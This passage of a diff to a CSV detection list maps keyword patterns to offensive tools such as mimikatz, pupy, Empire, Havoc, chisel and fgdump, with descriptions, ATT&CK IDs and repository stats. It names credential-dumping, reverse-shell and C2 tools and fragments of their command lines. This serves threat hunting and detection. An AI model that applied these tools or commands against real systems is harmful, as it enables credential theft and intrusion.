+"*Sensitivelocalfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*senzee1984/micr0_shell*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*seriously_nothing_shady_here*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*serve_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Server enforces NLA; switching to 'fake server' mode*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*serve_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Server enforces NLA; switching to 'fake server' mode*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*server.py generate --address * --port * --output * --source*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" "*server/modules/csharp/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*server@egress-asses.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*server=*port=53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" -"*-server=http://127.0.0.1:4002*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*server-7566091c4e4a2a24.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*-server=http://127.0.0.1:4002*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*server-7566091c4e4a2a24.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*server-console.exe +*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*server-console.py --mifi-ip *","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*--server-port * --server-ip * --proxy-ip * --proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" @@ -16366,16 +16549,16 @@ "*Server-Side-Request-Forgery-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*service/executable/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*service/executable/compile.exe*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" -"*service::me*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::preshutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::remove*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::shutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*service_permissions_escalate.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ServiceHavoc.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*service::me*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::preshutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::remove*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::shutdown*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*service_permissions_escalate.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ServiceHavoc.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*servicemove*hid.dll*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*servpw.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*servpw64.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -16383,23 +16566,23 @@ "*SessionGopher.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation 